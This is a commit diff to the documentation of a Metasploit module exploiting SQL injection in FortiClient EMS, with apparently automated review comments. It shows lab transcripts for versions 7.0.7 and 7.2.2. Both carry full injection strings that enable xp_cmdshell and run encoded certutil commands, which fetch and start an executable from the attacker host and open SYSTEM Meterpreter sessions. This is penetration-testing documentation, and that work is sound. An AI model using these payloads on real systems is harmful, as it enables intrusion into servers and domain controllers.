
Commit 48c69b9

Land rapid7#19344, FortiClient EMS FCTID SQLi to RCE fix for 7.2.x
2 parents 4b8e2b6 + 2ffe027 commit 48c69b9


2 files changed

+302
-100
lines changed


documentation/modules/exploit/windows/http/forticlient_ems_fctid_sqli.md

Lines changed: 139 additions & 15 deletions
@@ -71,7 +71,7 @@ and download and install the .msi package. Once installed correctly you should s
7171
1. Receive a Meterpreter session running in the context of `NT AUTHORITY\SYSTEM`
7272

7373
## Scenarios
74-
### FortiClient EMS 7.07.0398_x64 running on Windows Server 2019 (Domain Controller)
74+
### FortiClientEndpointManagementServer_7.0.7.0398_x64.exe running on Windows Server 2019 (Domain Controller)
7575
```
7676
msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > set rhosts 172.16.199.200
7777
rhosts => 172.16.199.200
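Review bot: The new heading corrects the version string ("7.07.0398" to "7.0.7.0398") so it now matches the "Version detected: 7.0.7" line in the run output, which is the useful part of this change; as a style point, using the raw installer filename as the heading makes it hard to scan, so consider "FortiClient EMS 7.0.7 (FortiClientEndpointManagementServer_7.0.7.0398_x64.exe) running on Windows Server 2019 (Domain Controller)" and the same form for the 7.2.2 scenario heading.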
@@ -101,7 +101,7 @@ Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):
101101
FETCH_URIPATH no Local URI to use for serving payload
102102
FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces.
103103
LHOST 172.16.199.1 yes The listen address (an interface may be specified)
104-
LPORT 8383 yes The listen port
104+
LPORT 4444 yes The listen port
105105
106106
107107
Exploit target:
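Review bot: The LPORT change from 8383 to 4444 only reflects that the output was re-captured with the default listener port; it is consistent with the new "Started reverse TCP handler on 172.16.199.1:4444" line later in the transcript, but since no "set lport" command appears in the scenario, a reader may wonder why the port changed, so a one-line note that the defaults were used would avoid confusion.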
@@ -114,32 +114,156 @@ Exploit target:
114114
115115
View the full module info with the info, or info -d command.
116116
117-
msf6 exploit(windows/http/forticlient_ems_fctid_sqli) >
117+
msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > set verbose true
118+
verbose => true
118119
msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > run
119120
[*] Reloading module...
120121
121-
[*] Started reverse TCP handler on 172.16.199.1:8383
122+
[*] Command to run on remote host: certutil -urlcache -f http://172.16.199.1:8080/-LHoYC22ccefBZaLFchCEQ %TEMP%\pzGnmDqDGUOb.exe & start /B %TEMP%\pzGnmDqDGUOb.exe
123+
[*] Fetch handler listening on 172.16.199.1:8080
124+
[*] HTTP server started
125+
[*] Adding resource /-LHoYC22ccefBZaLFchCEQ
126+
[*] Started reverse TCP handler on 172.16.199.1:4444
122127
[*] 172.16.199.200:8013 - Running automatic check ("set AutoCheck false" to disable)
123-
[+] 172.16.199.200:8013 - The target is vulnerable. The SQLi has been exploited successfully
124-
[+] 172.16.199.200:8013 - The SQLi: ' OR 1=1; exec master.dbo.sp_configure 'show advanced options', 1;-- was executed successfully
125-
[+] 172.16.199.200:8013 - The SQLi: ' OR 1=1; reconfigure;-- was executed successfully
126-
[+] 172.16.199.200:8013 - The SQLi: ' OR 1=1; exec master.dbo.sp_configure 'xp_cmdshell',1;-- was executed successfully
127-
[+] 172.16.199.200:8013 - The SQLi: ' OR 1=1; reconfigure;-- was executed successfully
128+
[*] 172.16.199.200:8013 - Sending the following message:
129+
MSG_HEADER: FCTUID=CBE8FC122B1A46D18C3541E1A8EFF7BD
130+
SIZE= 124
131+
X-FCCK-PROBE: PROBE_FEATURE_BITMAP0|1|
132+
X-FCCK-PROBE-END
133+
134+
135+
[*] 172.16.199.200:8013 - The response received was: FCPROBERPLY: FGT|FCTEMS0000125975:dc2.kerberos.issue|FEATURE_BITMAP|7|EMSVER|7000007|
136+
137+
[+] 172.16.199.200:8013 - The target appears to be vulnerable. Version detected: 7.0.7
138+
[*] 172.16.199.200:8013 - Returning SYSINFO for 7.0 target
139+
[*] 172.16.199.200:8013 - Sending the following message:
140+
MSG_HEADER: FCTUID=';EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; DECLARE @SQL VARCHAR(128) = CONVERT(VARCHAR(MAX), 0X636572747574696c202d75726c6361636865202d6620687474703a2f2f3137322e31362e3139392e313a383038302f2d4c486f5943323263636566425a614c466368434551202554454d50255c707a476e6d44714447554f622e6578652026207374617274202f42202554454d50255c707a476e6d44714447554f622e657865); exec master.dbo.xp_cmdshell @sql;--
141+
SIZE= 1900
142+
143+
X-FCCK-REGISTER: SYSINFO||QVZTSUdfVkVSPTEuMDAwMDAKUkVHX0tFWT1fCkVQX09OTkVUQ0hLU1VNPTAKQVZFTkdfVkVSPTYuMDAyNjYKREhDUF9TRVJWRVI9Tm9uZQpGQ1RPUz1XSU42NApWVUxTSUdfVkVSPTEuMDAwMDAKRkNUVkVSPTcuMC43LjA4NzkKQVBQU0lHX1ZFUj0xMy4wMDM2NApVU0VSPUFkbWluaXN0cmF0b3IKQVBQRU5HX1ZFUj00LjAwMDgyCkFWQUxTSUdfVkVSPTAuMDAwMDAKVlVMRU5HX1ZFUj0yLjAwMDMyCk9TVkVSPU1pY3Jvc29mdCBXaW5kb3dzIFNlcnZlciAyMDE5ICwgNjQtYml0IChidWlsZCAxNzc2MykKQ09NX01PREVMPVZNd2FyZSBWaXJ0dWFsIFBsYXRmb3JtClJTRU5HX1ZFUj0xLjAwMDIwCkFWX1BST1RFQ1RFRD0wCkFWQUxFTkdfVkVSPTAuMDAwMDAKUEVFUl9JUD0KRU5BQkxFRF9GRUFUVVJFX0JJVE1BUD00OQpFUF9PRkZORVRDSEtTVU09MApJTlNUQUxMRURfRkVBVFVSRV9CSVRNQVA9MTU4NTgzCkVQX0NIS1NVTT0wCkhJRERFTl9GRUFUVVJFX0JJVE1BUD0xNTU5NDMKRElTS0VOQz0KSE9TVE5BTUU9Q1lCRVItUkVUUUIxRkxQCkFWX1BST0RVQ1Q9CkZDVF9TTj1GQ1Q4MDAxNjM4ODQ4NjUxCklOU1RBTExVSUQ9QjRGNDQ1MEQtMTA4NS00RUIyLTkzMzItRkNCMDVFNzExRDE3Ck5XSUZTPUV0aGVybmV0MHwyMC4xNTQuOS40fGM0OmZjOjEyOmIzOjI3OmVmfDIxOS4xMDIuMzYuMjIwfGExOjhjOmJjOjBjOjJmOmE5fDF8KnwwClVUQz0xNzEwMjcxNzc0ClBDX0RPTUFJTj0KQ09NX01BTj1WTXdhcmUsIEluYy4KQ1BVPUludGVsKFIpIFhlb24oUikgU2lsdmVyIDQyMTUgQ1BVIEAgMi41MEdIegpNRU09MTIyODcKSEREPTk5CkNPTV9TTj1WTXdhcmUtNDIgMDQgZWQgMmQgNjQgZTggMGIgMTQtNDUgZTkgZTQgZjYgNWEgYzcgNjcgODIKRE9NQUlOPQpXT1JLR1JPVVA9V09SS0dST1VQClVTRVJfU0lEPVMtMS01LTIxLTMwLTUwLTAtNTAwCkdST1VQX1RBRz0KQURHVUlEPQpFUF9GR1RDSEtTVU09MApFUF9SVUxFQ0hLU1VNPTAKV0ZfRklMRVNDSEtTVU09MApFUF9BUFBDVFJMQ0hLU1VNPTAK
144+
145+
X-FCCK-REGISTER-END
146+
147+
148+
[*] Client 172.16.199.200 requested /-LHoYC22ccefBZaLFchCEQ
149+
[*] Sending payload to 172.16.199.200 (Microsoft-CryptoAPI/10.0)
150+
[*] Client 172.16.199.200 requested /-LHoYC22ccefBZaLFchCEQ
151+
[*] Sending payload to 172.16.199.200 (CertUtil URL Agent)
152+
[*] Sending stage (201798 bytes) to 172.16.199.200
153+
[*] 172.16.199.200:8013 - The response received was:
154+
[+] 172.16.199.200:8013 - The SQLi: ';EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; DECLARE @SQL VARCHAR(128) = CONVERT(VARCHAR(MAX), 0X636572747574696c202d75726c6361636865202d6620687474703a2f2f3137322e31362e3139392e313a383038302f2d4c486f5943323263636566425a614c466368434551202554454d50255c707a476e6d44714447554f622e6578652026207374617274202f42202554454d50255c707a476e6d44714447554f622e657865); exec master.dbo.xp_cmdshell @sql;-- was executed successfully
155+
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.200:50409) at 2024-07-24 09:35:07 -0700
156+
157+
meterpreter > getuid
158+
Server username: NT AUTHORITY\SYSTEM
159+
meterpreter > sysinfo
160+
Computer : DC2
161+
OS : Windows Server 2019 (10.0 Build 17763).
162+
Architecture : x64
163+
System Language : en_US
164+
Domain : KERBEROS
165+
Logged On Users : 9
166+
Meterpreter : x64/windows
167+
meterpreter >
168+
```
169+
170+
### FortiClientEndpointManagementServer_7.2.2.0879_x64.exe running on Windows Server 2019 (Domain Controller)
171+
```
172+
msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > set rhosts 172.16.199.200
173+
rhosts => 172.16.199.200
174+
msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > set lhost 172.16.199.1
175+
lhost => 172.16.199.1
176+
msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > set verbose true
177+
verbose => true
178+
msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > options
179+
180+
Module options (exploit/windows/http/forticlient_ems_fctid_sqli):
181+
182+
Name Current Setting Required Description
183+
---- --------------- -------- -----------
184+
RHOSTS 172.16.199.200 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
185+
RPORT 8013 yes The target port (TCP)
186+
VHOST no HTTP server virtual host
187+
188+
189+
Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):
190+
191+
Name Current Setting Required Description
192+
---- --------------- -------- -----------
193+
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
194+
FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
195+
FETCH_DELETE false yes Attempt to delete the binary after execution
196+
FETCH_FILENAME rixdOwaGgW no Name to use on remote system when storing payload; cannot contain spaces or slashes
197+
FETCH_SRVHOST no Local IP to use for serving payload
198+
FETCH_SRVPORT 8080 yes Local port to use for serving payload
199+
FETCH_URIPATH no Local URI to use for serving payload
200+
FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces.
201+
LHOST 172.16.199.1 yes The listen address (an interface may be specified)
202+
LPORT 4444 yes The listen port
203+
204+
205+
Exploit target:
206+
207+
Id Name
208+
-- ----
209+
0 Automatic Target
210+
211+
212+
213+
View the full module info with the info, or info -d command.
214+
215+
msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > run
216+
217+
[*] Command to run on remote host: certutil -urlcache -f http://172.16.199.1:8080/-LHoYC22ccefBZaLFchCEQ %TEMP%\xqUdZSzoE.exe & start /B %TEMP%\xqUdZSzoE.exe
218+
[*] Fetch handler listening on 172.16.199.1:8080
219+
[*] HTTP server started
220+
[*] Adding resource /-LHoYC22ccefBZaLFchCEQ
221+
[*] Started reverse TCP handler on 172.16.199.1:4444
222+
[*] 172.16.199.200:8013 - Running automatic check ("set AutoCheck false" to disable)
223+
[*] 172.16.199.200:8013 - Sending the following message:
224+
MSG_HEADER: FCTUID=CBE8FC122B1A46D18C3541E1A8EFF7BD
225+
SIZE= 124
226+
X-FCCK-PROBE: PROBE_FEATURE_BITMAP0|1|
227+
X-FCCK-PROBE-END
228+
229+
230+
[*] 172.16.199.200:8013 - The response received was: FCPROBERPLY: FGT|FCTEMS0000127184:dc2.kerberos.issue|FEATURE_BITMAP|7|EMSVER|7002002|PROTO_VERSION|1.0.0|PERCON|1|
231+
232+
[+] 172.16.199.200:8013 - The target appears to be vulnerable. Version detected: 7.2.2
233+
[*] 172.16.199.200:8013 - Returning SYSINFO for 7.2 target
234+
[*] 172.16.199.200:8013 - Sending the following message:
235+
MSG_HEADER: FCTUID=';EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'POWERSHELL.EXE -COMMAND ""Add-Type -AssemblyName System.Web; CMD.EXE /C ([SYSTEM.WEB.HTTPUTILITY]::URLDECODE("""%63%65%72%74%75%74%69%6C%20%2D%75%72%6C%63%61%63%68%65%20%2D%66%20%68%74%74%70%3A%2F%2F%31%37%32%2E%31%36%2E%31%39%39%2E%31%3A%38%30%38%30%2F%2D%4C%48%6F%59%43%32%32%63%63%65%66%42%5A%61%4C%46%63%68%43%45%51%20%25%54%45%4D%50%25%5C%78%71%55%64%5A%53%7A%6F%45%2E%65%78%65%20%26%20%73%74%61%72%74%20%2F%42%20%25%54%45%4D%50%25%5C%78%71%55%64%5A%53%7A%6F%45%2E%65%78%65"""))""';--
236+
IP=172.16.199.151
237+
MAC=00-0c-29-51-f7-4d
238+
FCT_ONNET=0
239+
CAPS=131071
240+
VDOM=Default
241+
EC_QUARANTINED=0
242+
SIZE= 2259
243+
244+
X-FCCK-REGISTER:SYSINFO|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|
245+
246+
X-FCCK-REGISTER-END
247+
248+
249+
[*] Client 172.16.199.200 requested /-LHoYC22ccefBZaLFchCEQ
250+
[*] Sending payload to 172.16.199.200 (Microsoft-CryptoAPI/10.0)
251+
[*] Client 172.16.199.200 requested /-LHoYC22ccefBZaLFchCEQ
252+
[*] Sending payload to 172.16.199.200 (CertUtil URL Agent)
128253
[*] Sending stage (201798 bytes) to 172.16.199.200
129-
[+] 172.16.199.200:8013 - The SQLi: ' OR 1=1; DECLARE @SQL VARCHAR(120) = CONVERT(VARCHAR(MAX), 0X636572747574696c202d75
130-
726c6361636865202d6620687474703a2f2f3137322e31362e3139392e313a383038302f7a524b42764743776d624662474c46336c4e6f486d772025
131-
54454d50255c6a744d45695362632e6578652026207374617274202f42202554454d50255c6a744d45695362632e657865); exec master.dbo.xp_cmdshell @sql;-- was executed successfully
132-
[*] Meterpreter session 8 opened (172.16.199.1:8383 -> 172.16.199.200:57847) at 2024-04-11 14:00:22 -0700
254+
[*] 172.16.199.200:8013 - The response received was:
255+
[+] 172.16.199.200:8013 - The SQLi: ';EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'POWERSHELL.EXE -COMMAND ""Add-Type -AssemblyName System.Web; CMD.EXE /C ([SYSTEM.WEB.HTTPUTILITY]::URLDECODE("""%63%65%72%74%75%74%69%6C%20%2D%75%72%6C%63%61%63%68%65%20%2D%66%20%68%74%74%70%3A%2F%2F%31%37%32%2E%31%36%2E%31%39%39%2E%31%3A%38%30%38%30%2F%2D%4C%48%6F%59%43%32%32%63%63%65%66%42%5A%61%4C%46%63%68%43%45%51%20%25%54%45%4D%50%25%5C%78%71%55%64%5A%53%7A%6F%45%2E%65%78%65%20%26%20%73%74%61%72%74%20%2F%42%20%25%54%45%4D%50%25%5C%78%71%55%64%5A%53%7A%6F%45%2E%65%78%65"""))""';-- was executed successfully
256+
[*] Meterpreter session 4 opened (172.16.199.1:4444 -> 172.16.199.200:28146) at 2024-07-23 16:17:56 -0700
133257
134258
meterpreter > getuid
135-
syServer username: NT AUTHORITY\SYSTEM
259+
Server username: NT AUTHORITY\SYSTEM
136260
meterpreter > sysinfo
137261
Computer : DC2
138262
OS : Windows Server 2019 (10.0 Build 17763).
139263
Architecture : x64
140264
System Language : en_US
141265
Domain : KERBEROS
142-
Logged On Users : 16
266+
Logged On Users : 9
143267
Meterpreter : x64/windows
144268
meterpreter >
145269
```
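Review bot: Missing documentation: the new 7.2.2 scenario uses a visibly different SQL payload from the 7.0.7 scenario (an "EXEC xp_cmdshell 'POWERSHELL.EXE -COMMAND ... URLDECODE(...)'" wrapper instead of the "DECLARE @SQL VARCHAR(128) = CONVERT(VARCHAR(MAX), 0X...)" form) and a different register message ("Returning SYSINFO for 7.2 target" with extra IP, MAC, FCT_ONNET, CAPS, VDOM and EC_QUARANTINED fields), yet the Scenarios section adds no prose explaining that 7.2.x needs a different message layout and payload encoding; a short paragraph before the 7.2.2 transcript would make the commit's purpose clear to users. Also, in both transcripts "[*] ... The response received was:" is printed with an empty body and is immediately followed by "[+] ... was executed successfully", so the docs (or the module's verbose output) should state that success is inferred from the payload callback rather than from any SQL response, otherwise the empty line looks like a failure. Finally, the full base64 SYSINFO blob in the 7.0.7 transcript adds no information for the reader and could be elided the same way the 7.2.2 blob is.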
